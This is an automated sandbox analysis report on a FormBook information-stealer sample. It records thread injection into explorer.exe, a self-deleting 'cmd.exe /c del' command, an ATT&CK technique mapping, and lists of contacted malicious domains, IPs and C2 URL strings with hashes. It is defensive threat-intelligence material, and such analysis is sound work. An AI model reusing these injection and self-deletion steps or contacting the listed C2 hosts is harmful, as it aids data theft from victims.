Queues an APC in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Thread register set: target process: 3424			Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Process created: C:\Users\user\Desktop\1D4l9eR0W4.exe C:\Users\user\Desktop\1D4l9eR0W4.exe			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\1D4l9eR0W4.exe"			Jump to behavior

Source: explorer.exe, 00000005.00000000.679319803.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.695758960.0000000000AD8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.666231552.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.682719192.0000000005E50000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.679561076.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.696324425.0000000001080000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.666485297.0000000001080000.00000002.00020000.sdmp, wlanext.exe, 00000007.00000002.920998111.0000000005C10000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.701557713.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.673622756.000000000A716000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.686546615.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Users\user\Desktop\1D4l9eR0W4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\1D4l9eR0W4.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\1D4l9eR0W4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.1D4l9eR0W4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.1D4l9eR0W4.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.44a63d0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.1D4l9eR0W4.exe.444edb0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.662565080.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.663054195.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.690177163.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713721764.00000000013C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920015100.0000000002EE0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.703698531.000000000E892000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713518901.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.920096919.0000000003200000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.919741475.0000000000A70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.713740606.00000000013F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.665552518.0000000004309000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection512	Masquerading1	Input Capture1	Security Software Discovery221	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Virtualization/Sandbox Evasion31	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	System Information Discovery112	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Obfuscated Files or Information3	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Software Packing13	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Timestomp1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
1D4l9eR0W4.exe	26%	Virustotal		Browse
1D4l9eR0W4.exe	24%	ReversingLabs	Win32.Trojan.Generic

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
7.2.wlanext.exe.cade18.1.unpack	100%	Avira	HEUR/AGEN.1110362	Download File
3.0.1D4l9eR0W4.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.2.1D4l9eR0W4.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.1D4l9eR0W4.exe.400000.8.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
3.0.1D4l9eR0W4.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
7.2.wlanext.exe.3b2796c.4.unpack	100%	Avira	HEUR/AGEN.1110362	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
www.scion-go-getter.com/mwev/	0%	Avira URL Cloud	safe
https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.foxandmew.com	107.164.242.49	true	true	unknown
royallecleaning.com	34.102.136.180	true	false	unknown
texascountrycharts.com	15.197.142.173	true	true	unknown
www.21yingyang.com	147.255.129.44	true	true	unknown
www.rip-online.com	43.132.183.85	true	true	unknown
9linefarms.com	34.102.136.180	true	false	unknown
websitessample.com	198.143.147.58	true	true	unknown
shops.myshopify.com	23.227.38.74	true	true	unknown
www.tikomobile.store	87.236.16.208	true	true	unknown
ghs.googlehosted.com	142.250.203.115	true	false	unknown
www.scion-go-getter.com	35.209.150.94	true	true	unknown
www.fulvousemollientplanet.com	unknown	unknown	true	unknown
www.sandman.network	unknown	unknown	true	unknown
www.fourthandwhiteoak.com	unknown	unknown	true	unknown
www.royallecleaning.com	unknown	unknown	true	unknown
www.websitessample.com	unknown	unknown	true	unknown
www.experimentwithoutlimits.com	unknown	unknown	true	unknown
www.9linefarms.com	unknown	unknown	true	unknown
www.texascountrycharts.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.scion-go-getter.com/mwev/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.foxandmew.com/mwev/?-Zf=rc6cG9leRruTx/YFamCczYYGme6fHdvMbIxv	wlanext.exe, 00000007.00000002.920741611.0000000003CA2000.00000004.00020000.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
147.255.129.44	www.21yingyang.com	United States	395954	LEASEWEB-USA-LAX-11US	true
198.143.147.58	websitessample.com	United States	32475	SINGLEHOP-LLCUS	true
142.250.203.115	ghs.googlehosted.com	United States	15169	GOOGLEUS	false
43.132.183.85	www.rip-online.com	Japan	4249	LILLY-ASUS	true
15.197.142.173	texascountrycharts.com	United States	7430	TANDEMUS	true
34.102.136.180	royallecleaning.com	United States	15169	GOOGLEUS	false
87.236.16.208	www.tikomobile.store	Russian Federation	198610	BEGET-ASRU	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
35.209.150.94	www.scion-go-getter.com	United States	19527	GOOGLE-2US	true
107.164.242.49	www.foxandmew.com	United States	18779	EGIHOSTINGUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	532910
Start date:	02.12.2021
Start time:	19:58:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1D4l9eR0W4 (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/1@13/10
EGA Information:	Failed
HDC Information:	Successful, ratio: 9% (good quality ratio 8%) Quality average: 73.5% Quality standard deviation: 31.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 90 Number of non-executed functions: 155
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 92.122.145.220 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
19:59:12	API Interceptor	1x Sleep call for process: 1D4l9eR0W4.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
147.255.129.44	SHIPPING DOCUMENT.xlsx	Get hash	malicious	Browse	www.21yingyang.com/mwev/?u0DdGBi=iTGszEHlBYgcRwpId8qTe/0GehEi8eYY5QbC9Xr3Bat1wyeYeVdDfMMehGeT7pNsgv6CGA==&HpVD=iXlpidI0s6mDitEp
198.143.147.58	reg.exe	Get hash	malicious	Browse	www.websitessample.com/mwev/?rZVL=6lrP2VgHHTnd&r6=IXYNpvQ1BiZ44tShy9SgvoX4c9kgPxO5K/+6kCom7tZxGdFtiZvct/5RRqPb8zpCe6E2r5wI1g==
43.132.183.85	ufKi6DmWMQCuEb4.exe	Get hash	malicious	Browse	www.healthhe.com/9wgi/?mTnDMfL=nQGjtlZ7eRUHwP4Z4tO8cV7Bzgn9otHTDQD7oplJJHpTPPdwy0qEHwINuBUe4zIxwCsGJlojCg==&r0GT=mDK8ZPtxNpdLjB
	jwcvWLwp0CZr8vg.exe	Get hash	malicious	Browse	www.healthhe.com/9wgi/?3fxxp=EBZTNj0PnHVpFH&dzu=nQGjtlZ7eRUHwP4Z4tO8cV7Bzgn9otHTDQD7oplJJHpTPPdwy0qEHwINuC4OkCUK33FX
	Ro45xx19mJ.exe	Get hash	malicious	Browse	www.rip-online.com/mwev/?JBC=v0GDzH582Ju&0TTl=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/DbytGeiQy
	Quote request.exe	Get hash	malicious	Browse	www.danspector.com/s2qi/?TJELpfLP=wk5o9Nw0j1iN37aRpEOlI+T8U4PCxjQomsRo9YSbE/cxw239lSyuv2lXox8CT+4oiR0o&3f=5jlpdHK
	Order Information.exe	Get hash	malicious	Browse	www.tnea2014.com/ku75/?Nzr=wkPyjuKu05wfVewMtaIstfs5BkK/aSiXXagUckB5lM3cdyxhPyMoX6I/2wUATQlZH5SF&CpFPs=4hhtux5884
	NCh22JHZDm.exe	Get hash	malicious	Browse	www.rip-online.com/mwev/?G2JH=XHKxqvvx_ZS4e&vL3=4s7fstVSzLCadPpci11R7qAZUnePXrmWLsX7/7GiC0yrg0b/n74rqRMRm0/DbytGeiQy
	oE0LTpFfM5.exe	Get hash	malicious	Browse	www.mid-a.com/sywu/?TBut=WgpeYtAseThH4QtfgVv0cb7Bg0jNPj9o5cTJSX1UgoRmdi55VpY+UI31BhB8YZPKC1Kd&vZht5=VvQH
	2FNlQLySZS.exe	Get hash	malicious	Browse	www.tinkerform.com/sb6n/?0D=pRSBl5iInDQS/mEmghDJpafSsKdl6W/ss2J4xFBNSpqvPWTEIxu+aBxjWe+O9C7y0cHr&nTVpz=Sd0TT4
	soa_02010021.exe	Get hash	malicious	Browse	www.ejezeta3d.com/nqn4/?-ZddGje=pJ0bBDGBV2J76o+yGQK16eA9Gz37NHdqUA04Td04W41QkvryWymFX7LPCOYt2g0zDZcJ&3ffLp=fp_T0dZXgD
	Nueva orden de investigaci#U00f3n de Desppo.exe	Get hash	malicious	Browse	www.glottogon.com/b5ce/?jHedL=ckMRj/bQcJ3zkEaLUVXE630jgoKCI0iVURz6YRY0HozN/iyT/73YqkbmlSCbTPo2a7Pz&GvFLR=KN64Dj
	DOCS-0094-LPO.exe	Get hash	malicious	Browse	www.glottogon.com/b5ce/?YHF=ckMRj/bQcJ3zkEaLUVXE630jgoKCI0iVURz6YRY0HozN/iyT/73YqkbmlRihDeIOAcu0&YP=u41l2ZNhXfZlaX50

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.21yingyang.com	SHIPPING DOCUMENT.xlsx	Get hash	malicious	Browse	147.255.129.44
www.scion-go-getter.com	reg.exe	Get hash	malicious	Browse	35.209.150.94
	SHIPPING DOCUMENT.xlsx	Get hash	malicious	Browse	35.209.150.94
	k5RK7H1oSH.exe	Get hash	malicious	Browse	35.209.150.94
	Ro45xx19mJ.exe	Get hash	malicious	Browse	35.209.150.94
	NCh22JHZDm.exe	Get hash	malicious	Browse	35.209.150.94
	SHIPPPING-DOC.xlsx	Get hash	malicious	Browse	35.209.150.94
	dG6oqbfIce.exe	Get hash	malicious	Browse	35.209.150.94
	SHIPPING DOCUMENT.xlsx	Get hash	malicious	Browse	35.209.150.94
www.rip-online.com	Ro45xx19mJ.exe	Get hash	malicious	Browse	43.132.183.85
	NCh22JHZDm.exe	Get hash	malicious	Browse	43.132.183.85
	Order Confirmation.exe	Get hash	malicious	Browse	43.132.183.85
shops.myshopify.com	Milleniumbpc.xlsx	Get hash	malicious	Browse	23.227.38.74
	Narudzba.0953635637.PDF.exe	Get hash	malicious	Browse	23.227.38.74
	Packing List.exe	Get hash	malicious	Browse	23.227.38.74
	DHL_AWB_NO#907853880911.exe	Get hash	malicious	Browse	23.227.38.74
	Poh Tiong Trading - products list.exe	Get hash	malicious	Browse	23.227.38.74
	DHL SHIPMENT NOTIFICATION 284748395,PDF.exe	Get hash	malicious	Browse	23.227.38.74
	Original Doc Ref 2853801324189923.exe	Get hash	malicious	Browse	23.227.38.74
	Doc_PrInd011221.xlsx	Get hash	malicious	Browse	23.227.38.74
	PAYMENT_.EXE	Get hash	malicious	Browse	23.227.38.74
	ixhqecYUbg.exe	Get hash	malicious	Browse	23.227.38.74
	SHIPPING DOCUMENT.xlsx	Get hash	malicious	Browse	23.227.38.74
	00110030.exe	Get hash	malicious	Browse	23.227.38.74
	Order Inquiry1.exe	Get hash	malicious	Browse	23.227.38.74
	Sat#U0131n alma emri.exe	Get hash	malicious	Browse	23.227.38.74
	Consignment Notification.exe	Get hash	malicious	Browse	23.227.38.74
	ZByFnffjIp.exe	Get hash	malicious	Browse	23.227.38.74
	Dhl_AWB5032675620,pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Order29112021.xlsx	Get hash	malicious	Browse	23.227.38.74
	Documnet 29.11.2021.xlsx	Get hash	malicious	Browse	23.227.38.74
	STATEMENT .doc	Get hash	malicious	Browse	23.227.38.74

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SINGLEHOP-LLCUS	reg.exe	Get hash	malicious	Browse	198.143.147.58
	OVER R RICHIESTA D'OFFERTA ITEM R206,pdf.exe	Get hash	malicious	Browse	173.236.126.10
	ZByFnffjIp.exe	Get hash	malicious	Browse	198.143.141.58
	BVSwXNK8j6.exe	Get hash	malicious	Browse	198.20.110.107
	Zr26f1rL6r.exe	Get hash	malicious	Browse	107.6.148.162
	B67M2Q6NeK	Get hash	malicious	Browse	65.62.12.157
	jydygx.x86	Get hash	malicious	Browse	69.175.81.126
	TikNgaeW5G	Get hash	malicious	Browse	65.60.29.39
	wPLf38GLbn	Get hash	malicious	Browse	108.163.249.5
	4IjC16LtGD	Get hash	malicious	Browse	184.154.111.112
	6bitgZ9pqQ	Get hash	malicious	Browse	63.251.15.144
	z0x3n.arm7	Get hash	malicious	Browse	184.154.183.255
	3bTl0OgWsE	Get hash	malicious	Browse	65.63.38.128
	9B6EN8PxhH	Get hash	malicious	Browse	65.62.1.143
	bc3ttunRjZ	Get hash	malicious	Browse	65.62.1.159
	gEozNq7ILx	Get hash	malicious	Browse	199.26.251.75
	l0vNaPgd6f	Get hash	malicious	Browse	65.63.160.62
	KKveTTgaAAsecNNaaaa.arm	Get hash	malicious	Browse	65.60.17.10
	mips	Get hash	malicious	Browse	65.63.92.227
	BS0Dxmu2go	Get hash	malicious	Browse	65.63.212.249
LEASEWEB-USA-LAX-11US	RFQ - SST#2021111503.exe	Get hash	malicious	Browse	108.187.86.48
	YjKK5XYBzB	Get hash	malicious	Browse	172.255.161.176
	JUyE95BLaL	Get hash	malicious	Browse	172.255.161.168
	9hyE41yNDB	Get hash	malicious	Browse	23.86.78.90
	triage_dropped_file.exe	Get hash	malicious	Browse	23.110.31.106
	vbc.exe	Get hash	malicious	Browse	23.110.31.106
	xd.x86	Get hash	malicious	Browse	23.80.138.175
	eKmL8hvXz2	Get hash	malicious	Browse	108.187.220.76
	TsOl2c6Yc6	Get hash	malicious	Browse	23.83.26.237
	SALES CONFIRMATION 153_154 SN.xlsx	Get hash	malicious	Browse	23.110.31.106
	oQANZnrt9d	Get hash	malicious	Browse	23.83.26.245
	xzKS6P1qDo.exe	Get hash	malicious	Browse	23.104.53.233
	apep.mips	Get hash	malicious	Browse	108.187.80.246
	7H5yVEypQX	Get hash	malicious	Browse	23.85.79.155
	7OjVU04f8q.exe	Get hash	malicious	Browse	23.110.31.75
	DuxgwH47QB.exe	Get hash	malicious	Browse	23.110.128.234
	ORDER.doc	Get hash	malicious	Browse	23.110.128.234
	SWIFT-MLSB-11,546__doc.exe	Get hash	malicious	Browse	23.110.95.195
	BwJriVGrt5.exe	Get hash	malicious	Browse	23.110.31.77
	29383773738387477474774.exe	Get hash	malicious	Browse	142.234.161.17

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1D4l9eR0W4.exe.log Download File
Process:	C:\Users\user\Desktop\1D4l9eR0W4.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.345651901398759
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
MD5:	D918C6A765EDB90D2A227FE23A3FEC98
SHA1:	8BA802AD8D740F114783F0DADC407CBFD2A209B3
SHA-256:	AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
SHA-512:	A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.732950623221911
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	1D4l9eR0W4.exe
File size:	415744
MD5:	192b796d92d190c45204571599c38c86
SHA1:	611559df5b74934dea4c81a5490e2c64a73ee6e0
SHA256:	23c8bfea897f9833766ceab96299a77ad19ed1e0897b7e30d56d2c56c30d2d4e
SHA512:	da9e4bb2300d2968125427d122d5e81cecf2d342dc2c17fc16d5dc1ac7f511d53e75233c1844c1948f6a82740818166229e7ea2411a40351c54e8e97a3b4ec42
SSDEEP:	6144:4z2kQqvZRHkXGQTY22C7/GXrBPKCQAm9Xuijhw7+57SUTnzvzHKQhZgoWL:FXGop2CDGXr5K6m9XuijK+Rzv7KvX
